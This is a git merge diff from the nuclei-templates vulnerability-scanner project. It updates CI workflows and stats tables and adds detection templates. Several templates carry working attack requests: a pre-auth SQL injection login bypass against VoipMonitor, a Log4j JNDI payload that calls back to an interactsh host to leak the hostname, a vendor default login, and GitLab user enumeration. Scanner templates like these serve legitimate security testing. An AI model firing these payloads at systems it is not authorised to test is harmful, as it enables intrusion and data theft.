Merge branch 'projectdiscovery:master' into dashboard
commit
21d872d42c
|
@ -10,23 +10,25 @@ jobs:
|
|||
docs:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
with:
|
||||
persist-credentials: false
|
||||
fetch-depth: 0
|
||||
token: ${{ secrets.GITHUB_TOKEN }}
|
||||
- uses: actions/checkout@v2
|
||||
|
||||
- uses: actions/setup-go@v2
|
||||
with:
|
||||
go-version: 1.17
|
||||
- name: Get Github tag
|
||||
id: meta
|
||||
run: |
|
||||
echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)"
|
||||
|
||||
- name: Setup CVE annotate
|
||||
if: steps.meta.outputs.tag != ''
|
||||
env:
|
||||
VERSION: ${{ steps.meta.outputs.tag }}
|
||||
run: |
|
||||
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/cve-annotate.zip
|
||||
sudo unzip cve-annotate.zip -d /usr/local/bin
|
||||
working-directory: /tmp
|
||||
|
||||
- name: Generate CVE Annotations
|
||||
id: cve-annotate
|
||||
run: |
|
||||
if ! which cve-annotate > /dev/null; then
|
||||
echo -e "Command cve-annotate not found! Installing\c"
|
||||
go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@dev
|
||||
fi
|
||||
cve-annotate -i ./cves/ -d .
|
||||
echo "::set-output name=changes::$(git status -s | wc -l)"
|
||||
|
||||
|
@ -44,4 +46,4 @@ jobs:
|
|||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
branch: ${{ github.ref }}
|
||||
branch: ${{ github.ref }}
|
|
@ -6,25 +6,17 @@ jobs:
|
|||
build:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
- uses: actions/checkout@v2
|
||||
|
||||
- name: Get latest Nuclei release version
|
||||
id: nuclei-latest
|
||||
uses: actions/github-script@v5
|
||||
with:
|
||||
result-encoding: string
|
||||
script: |
|
||||
const release = await github.rest.repos.getLatestRelease({
|
||||
owner: 'projectdiscovery',
|
||||
repo: 'nuclei',
|
||||
});
|
||||
|
||||
return release.data.name
|
||||
- name: Get Github tag
|
||||
id: meta
|
||||
run: |
|
||||
echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)"
|
||||
|
||||
- name: Setup Nuclei
|
||||
if: steps.nuclei-latest.outputs.result != ''
|
||||
if: steps.meta.outputs.tag != ''
|
||||
env:
|
||||
VERSION: ${{ steps.nuclei-latest.outputs.result }}
|
||||
VERSION: ${{ steps.meta.outputs.tag }}
|
||||
run: |
|
||||
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/nuclei_${VERSION:1}_linux_amd64.zip
|
||||
sudo unzip nuclei*.zip -d /usr/local/bin
|
||||
|
|
|
@ -1,46 +1,3 @@
|
|||
cnvd/2019/CNVD-2019-19299.yaml
|
||||
cnvd/2019/CNVD-2019-32204.yaml
|
||||
cnvd/2021/CNVD-2021-09650.yaml
|
||||
cnvd/2021/CNVD-2021-15824.yaml
|
||||
cnvd/2022/CNVD-2022-03672.yaml
|
||||
cves/2017/CVE-2017-18598.yaml
|
||||
cves/2018/CVE-2018-16716.yaml
|
||||
cves/2018/CVE-2018-18264.yaml
|
||||
cves/2018/CVE-2018-19365.yaml
|
||||
cves/2019/CVE-2019-9726.yaml
|
||||
cves/2020/CVE-2020-35234.yaml
|
||||
cves/2021/CVE-2021-24762.yaml
|
||||
cves/2021/CVE-2021-41192.yaml
|
||||
cves/2021/CVE-2021-44521.yaml
|
||||
cves/2022/CVE-2022-21371.yaml
|
||||
cves/2022/CVE-2022-22536.yaml
|
||||
cves/2022/CVE-2022-22947.yaml
|
||||
cves/2022/CVE-2022-23134.yaml
|
||||
cves/2022/CVE-2022-24124.yaml
|
||||
exposed-panels/casdoor-login.yaml
|
||||
exposed-panels/digitalrebar-login.yaml
|
||||
exposed-panels/directum-login.yaml
|
||||
exposed-panels/homematic-panel.yaml
|
||||
exposed-panels/issabel-login.yaml
|
||||
exposed-panels/librenms-login.yaml
|
||||
exposed-panels/ocs-inventory-login.yaml
|
||||
exposed-panels/phoronix-pane;.yaml
|
||||
exposed-panels/raspberrymatic-panel.yaml
|
||||
exposed-panels/redash-panel.yaml
|
||||
exposed-panels/subrion-login.yaml
|
||||
exposures/configs/prometheus-metrics.yaml
|
||||
misconfiguration/gitlab/gitlab-uninitialized-password.yaml
|
||||
technologies/empirecms-detect.yaml
|
||||
technologies/jeecg-boot-detect.yaml
|
||||
technologies/livehelperchat-detect.yaml
|
||||
technologies/microweber-detect.yaml
|
||||
technologies/php-fusion-detect.yaml
|
||||
technologies/piwigo-detect.yaml
|
||||
technologies/snipeit-panel.yaml
|
||||
technologies/subrion-cms-detect.yaml
|
||||
token-spray/api-launchdarkly.yaml
|
||||
vulnerabilities/cisco/cucm-username-enumeration.yaml
|
||||
vulnerabilities/other/microweber-xss.yaml
|
||||
vulnerabilities/wordpress/dzs-zoomsounds-listing.yaml
|
||||
vulnerabilities/wordpress/wp-adaptive-xss.yaml
|
||||
vulnerabilities/wordpress/wp-qards-listing.yaml
|
||||
cves/2022/CVE-2022-23779.yaml
|
||||
default-logins/digitalrebar/digitalrebar-default-login.yaml
|
||||
vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml
|
||||
|
|
22
README.md
22
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1025 | daffainfo | 539 | cves | 1031 | info | 1042 | http | 2833 |
|
||||
| panel | 429 | dhiyaneshdk | 405 | exposed-panels | 430 | high | 769 | file | 57 |
|
||||
| lfi | 422 | pikpikcu | 302 | vulnerabilities | 414 | medium | 606 | network | 48 |
|
||||
| xss | 329 | pdteam | 253 | technologies | 217 | critical | 374 | dns | 16 |
|
||||
| wordpress | 324 | geeknik | 174 | exposures | 199 | low | 172 | | |
|
||||
| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 187 | | | | |
|
||||
| rce | 262 | 0x_akoko | 107 | workflows | 185 | | | | |
|
||||
| cve2021 | 245 | gy741 | 106 | token-spray | 146 | | | | |
|
||||
| wp-plugin | 231 | pussycat0x | 102 | default-logins | 75 | | | | |
|
||||
| tech | 229 | princechaddha | 99 | takeovers | 67 | | | | |
|
||||
| cve | 1046 | daffainfo | 544 | cves | 1051 | info | 1064 | http | 2880 |
|
||||
| panel | 441 | dhiyaneshdk | 406 | exposed-panels | 441 | high | 776 | file | 57 |
|
||||
| lfi | 426 | pikpikcu | 313 | vulnerabilities | 417 | medium | 616 | network | 49 |
|
||||
| xss | 333 | pdteam | 255 | technologies | 225 | critical | 384 | dns | 16 |
|
||||
| wordpress | 328 | geeknik | 174 | exposures | 199 | low | 171 | | |
|
||||
| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 188 | | | | |
|
||||
| rce | 267 | 0x_akoko | 111 | workflows | 185 | | | | |
|
||||
| cve2021 | 250 | gy741 | 108 | token-spray | 147 | | | | |
|
||||
| tech | 236 | princechaddha | 106 | default-logins | 74 | | | | |
|
||||
| wp-plugin | 235 | pussycat0x | 104 | takeovers | 67 | | | | |
|
||||
|
||||
**221 directories, 3173 files**.
|
||||
**222 directories, 3221 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
File diff suppressed because one or more lines are too long
2641
TEMPLATES-STATS.md
2641
TEMPLATES-STATS.md
File diff suppressed because it is too large
Load Diff
20
TOP-10.md
20
TOP-10.md
|
@ -1,12 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1025 | daffainfo | 539 | cves | 1031 | info | 1042 | http | 2833 |
|
||||
| panel | 429 | dhiyaneshdk | 405 | exposed-panels | 430 | high | 769 | file | 57 |
|
||||
| lfi | 422 | pikpikcu | 302 | vulnerabilities | 414 | medium | 606 | network | 48 |
|
||||
| xss | 329 | pdteam | 253 | technologies | 217 | critical | 374 | dns | 16 |
|
||||
| wordpress | 324 | geeknik | 174 | exposures | 199 | low | 172 | | |
|
||||
| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 187 | | | | |
|
||||
| rce | 262 | 0x_akoko | 107 | workflows | 185 | | | | |
|
||||
| cve2021 | 245 | gy741 | 106 | token-spray | 146 | | | | |
|
||||
| wp-plugin | 231 | pussycat0x | 102 | default-logins | 75 | | | | |
|
||||
| tech | 229 | princechaddha | 99 | takeovers | 67 | | | | |
|
||||
| cve | 1046 | daffainfo | 544 | cves | 1051 | info | 1064 | http | 2880 |
|
||||
| panel | 441 | dhiyaneshdk | 406 | exposed-panels | 441 | high | 776 | file | 57 |
|
||||
| lfi | 426 | pikpikcu | 313 | vulnerabilities | 417 | medium | 616 | network | 49 |
|
||||
| xss | 333 | pdteam | 255 | technologies | 225 | critical | 384 | dns | 16 |
|
||||
| wordpress | 328 | geeknik | 174 | exposures | 199 | low | 171 | | |
|
||||
| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 188 | | | | |
|
||||
| rce | 267 | 0x_akoko | 111 | workflows | 185 | | | | |
|
||||
| cve2021 | 250 | gy741 | 108 | token-spray | 147 | | | | |
|
||||
| tech | 236 | princechaddha | 106 | default-logins | 74 | | | | |
|
||||
| wp-plugin | 235 | pussycat0x | 104 | takeovers | 67 | | | | |
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CNVD-2019-19299
|
||||
|
||||
info:
|
||||
name: Zhiyuan A8 Arbitrary File Writing to Remote Code Execution
|
||||
name: Zhiyuan A8 Arbitrary File Write (RCE)
|
||||
author: daffainfo
|
||||
severity: critical
|
||||
reference:
|
||||
|
|
|
@ -0,0 +1,56 @@
|
|||
id: CVE-2019-10405
|
||||
|
||||
info:
|
||||
name: Diagnostic page exposed Cookie HTTP header
|
||||
severity: medium
|
||||
author: c-sh0
|
||||
description: Jenkins 2.196 and earlier, LTS 2.176.3 and earlier printed the value of the Cookie on the /whoAmI/ URL
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-10405
|
||||
- https://jenkins.io/security/advisory/2019-09-25/#SECURITY-1505
|
||||
metadata:
|
||||
shodan-query: http.favicon.hash:81586312
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 4.30
|
||||
cve-id: CVE-2019-10405
|
||||
cwe-id: CWE-200
|
||||
tags: cve,cve2019,jenkins
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET {{BaseURL}}/whoAmI/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET {{BaseURL}}/whoAmI/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
req-condition: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'text/html'
|
||||
- 'x-jenkins'
|
||||
condition: and
|
||||
case-insensitive: true
|
||||
|
||||
- type: word
|
||||
part: body_2
|
||||
words:
|
||||
- 'Cookie'
|
||||
- 'JSESSIONID'
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
- x_jenkins
|
|
@ -0,0 +1,56 @@
|
|||
id: CVE-2020-2103
|
||||
|
||||
info:
|
||||
name: Diagnostic page exposed session cookies
|
||||
severity: medium
|
||||
author: c-sh0
|
||||
description: Jenkins 2.218 and earlier, LTS 2.204.1 and earlier exposed session identifiers on a users detail object in the whoAmI diagnostic page.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-2103
|
||||
- https://www.jenkins.io/security/advisory/2020-01-29/#SECURITY-1695
|
||||
metadata:
|
||||
shodan-query: http.favicon.hash:81586312
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 5.40
|
||||
cve-id: CVE-2020-2103
|
||||
cwe-id: CWE-200
|
||||
tags: cve,cve2020,jenkins
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET {{BaseURL}}/whoAmI/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET {{BaseURL}}/whoAmI/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
req-condition: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'text/html'
|
||||
- 'x-jenkins'
|
||||
condition: and
|
||||
case-insensitive: true
|
||||
|
||||
- type: word
|
||||
part: body_2
|
||||
words:
|
||||
- 'Cookie'
|
||||
- 'SessionId: null'
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
- x_jenkins
|
|
@ -0,0 +1,49 @@
|
|||
id: CVE-2021-4191
|
||||
|
||||
info:
|
||||
name: GitLab GraphQL API User Enumeration
|
||||
author: zsusac
|
||||
severity: medium
|
||||
description: A remote, unauthenticated attacker can use this vulnerability to collect registered GitLab usernames, names, and email addresses.
|
||||
reference:
|
||||
- https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/
|
||||
- https://thehackernews.com/2022/03/new-security-vulnerability-affects.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:5.3/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.3
|
||||
cve-id: CVE-2021-4191
|
||||
cwe-id: CWE-359
|
||||
tags: cve,cve2021,gitlab,api,graphql,enum,unauth
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /api/graphql HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
Accept: */*
|
||||
Origin: {{RootURL}}
|
||||
Referer: {{RootURL}}/-/graphql-explorer
|
||||
|
||||
{"query":"# Welcome to GraphiQL\n#\n# GraphiQL is an in-browser tool for writing, validating, and\n# testing GraphQL queries.\n#\n# Type queries into this side of the screen, and you will see intelligent\n# typeaheads aware of the current GraphQL type schema and live syntax and\n# validation errors highlighted within the text.\n#\n# GraphQL queries typically start with a \"{\" character. Lines that starts\n# with a # are ignored.\n#\n# An example GraphQL query might look like:\n#\n# {\n# field(arg: \"value\") {\n# subField\n# }\n# }\n#\n# Keyboard shortcuts:\n#\n# Prettify Query: Shift-Ctrl-P (or press the prettify button above)\n#\n# Run Query: Ctrl-Enter (or press the play button above)\n#\n# Auto Complete: Ctrl-Space (or just start typing)\n#\n\n{\n users {\n nodes {\n id\n name\n username\n }\n }\n}","variables":null,"operationName":null}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"data"'
|
||||
- '"users"'
|
||||
- '"nodes"'
|
||||
- '"id"'
|
||||
- 'gid://'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: json
|
||||
json:
|
||||
- '.data.users.nodes[].username'
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2022-0692
|
||||
|
||||
info:
|
||||
name: Rudloff alltube prior to 3.0.1 - Open Redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: Open Redirect on Rudloff/alltube in Packagist rudloff/alltube prior to 3.0.1
|
||||
reference:
|
||||
- https://huntr.dev/bounties/4fb39400-e08b-47af-8c1f-5093c9a51203/
|
||||
- https://www.cvedetails.com/cve/CVE-2022-0692
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2022-0692
|
||||
cwe-id: CWE-601
|
||||
tags: cve,cve2022,redirect,rudloff,alltube
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/index.php/example.com'
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
|
@ -53,7 +53,7 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "400 Bad Request" # error in concatenated response
|
||||
- "500 Internal Server Error"
|
||||
- "500 Dispatching Error"
|
||||
- "HTTP/1.0 400 Bad Request" # error in concatenated response
|
||||
- "HTTP/1.0 500 Internal Server Error"
|
||||
- "HTTP/1.0 500 Dispatching Error"
|
||||
condition: or
|
||||
|
|
|
@ -0,0 +1,43 @@
|
|||
id: CVE-2022-23779
|
||||
|
||||
info:
|
||||
name: Zoho ManageEngine - Internal Hostname Disclosure
|
||||
author: cckuailong
|
||||
severity: medium
|
||||
description: Zoho ManageEngine Desktop Central before 10.1.2137.8 exposes the installed server name to anyone. The internal hostname can be discovered by reading HTTP redirect responses.
|
||||
reference:
|
||||
- https://www.manageengine.com/products/desktop-central/cve-2022-23779.html
|
||||
- https://github.com/fbusr/CVE-2022-23779
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-23779
|
||||
metadata:
|
||||
fofa-query: app="ZOHO-ManageEngine-Desktop"
|
||||
tags: cve,cve2022,zoho,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/themes"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 301
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- '/themes/'
|
||||
- 'text/html'
|
||||
condition: and
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- '!contains(location,host)'
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: header
|
||||
group: 1
|
||||
regex:
|
||||
- 'https?:\/\/(.*):'
|
|
@ -0,0 +1,47 @@
|
|||
id: CVE-2022-24260
|
||||
|
||||
info:
|
||||
name: VoipMonitor - Pre-Auth SQL injection
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.
|
||||
reference:
|
||||
- https://kerbit.io/research/read/blog/3
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-24260
|
||||
- https://www.voipmonitor.org/changelog-gui?major=5
|
||||
metadata:
|
||||
shodan-query: http.title:"VoIPmonitor"
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2022-24260
|
||||
cwe-id: CWE-89
|
||||
tags: cve,cve2022,voipmonitor,sqli,unauth
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /api.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
module=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '"success":true'
|
||||
- '_vm_version'
|
||||
- '_debug'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
- PHPSESSID
|
|
@ -0,0 +1,40 @@
|
|||
id: digitalrebar-default-login
|
||||
|
||||
info:
|
||||
name: RackN Digital Rebar provision default login
|
||||
author: c-sh0
|
||||
severity: high
|
||||
reference: https://docs.rackn.io/en/latest/doc/faq-troubleshooting.html?#what-are-the-default-passwords
|
||||
tags: rackn,digitalrebar,default-login
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /api/v3/users HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Authorization: Basic {{base64(username + ':' + password)}}
|
||||
|
||||
payloads:
|
||||
username:
|
||||
- rocketskates
|
||||
password:
|
||||
- r0cketsk8ts
|
||||
|
||||
attack: pitchfork
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?i)(X-Drp-)'
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'Name'
|
||||
- 'Secret'
|
||||
condition: and
|
|
@ -1,32 +1,39 @@
|
|||
id: jenkins-detect
|
||||
|
||||
info:
|
||||
name: Jenkins detect (version)
|
||||
author: philippdelteil,daffainfo
|
||||
name: Jenkins Detection
|
||||
author: philippdelteil,daffainfo,c-sh0
|
||||
severity: info
|
||||
reference:
|
||||
- https://www.jenkins.io/doc/book/using/remote-access-api/#RemoteaccessAPI-DetectingJenkinsversion
|
||||
- https://github.com/jenkinsci/jenkins/pull/470
|
||||
- https://www.jenkins.io/doc/book/security/access-control/permissions/#access-granted-without-overallread
|
||||
metadata:
|
||||
shodan-query: http.favicon.hash:81586312
|
||||
tags: tech,jenkins
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
- "{{BaseURL}}/whoAmI/"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "X-Jenkins"
|
||||
- "X-Jenkins-Session"
|
||||
part: header
|
||||
condition: and
|
||||
words:
|
||||
- "x-jenkins"
|
||||
case-insensitive: true
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "<title>Dashboard [Jenkins]</title>"
|
||||
part: body
|
||||
- "Jenkins"
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
part: header
|
||||
kval:
|
||||
- x_jenkins
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: cucm-username-enumeration
|
||||
|
||||
info:
|
||||
name: Cisco Unified Call Manager (CUCM) User Data Services Username Enumeration API - Unauthenticated
|
||||
name: Cisco Unified Call Manager Username Enumeration
|
||||
author: manasmbellani
|
||||
severity: medium
|
||||
reference: https://www.n00py.io/2022/01/unauthenticated-dumping-of-usernames-via-cisco-unified-call-manager-cucm/
|
||||
|
|
|
@ -0,0 +1,41 @@
|
|||
id: vrealize-operations-log4j-rce
|
||||
|
||||
info:
|
||||
name: vRealize Operations Tenant App Log4j JNDI RCE
|
||||
author: bughuntersurya
|
||||
severity: critical
|
||||
description: A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in an impacted vRealize Operations Tenant Application.
|
||||
reference: https://www.vmware.com/security/advisories/VMSA-2021-0028.html
|
||||
metadata:
|
||||
shodan-query: http.title:"vRealize Operations Tenant App"
|
||||
tags: rce,log4j,vmware,vrealize
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /suite-api/api/auth/token/acquire HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
Origin: {{RootURL}}
|
||||
Referer: {{RootURL}}/ui/
|
||||
|
||||
{"username":"${jndi:ldap://${hostName}.{{interactsh-url}}}","password":"admin"}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns" # Confirms the DNS Interaction
|
||||
|
||||
- type: regex
|
||||
part: interactsh_request
|
||||
regex:
|
||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: interactsh_request
|
||||
group: 1
|
||||
regex:
|
||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
Loading…
Reference in New Issue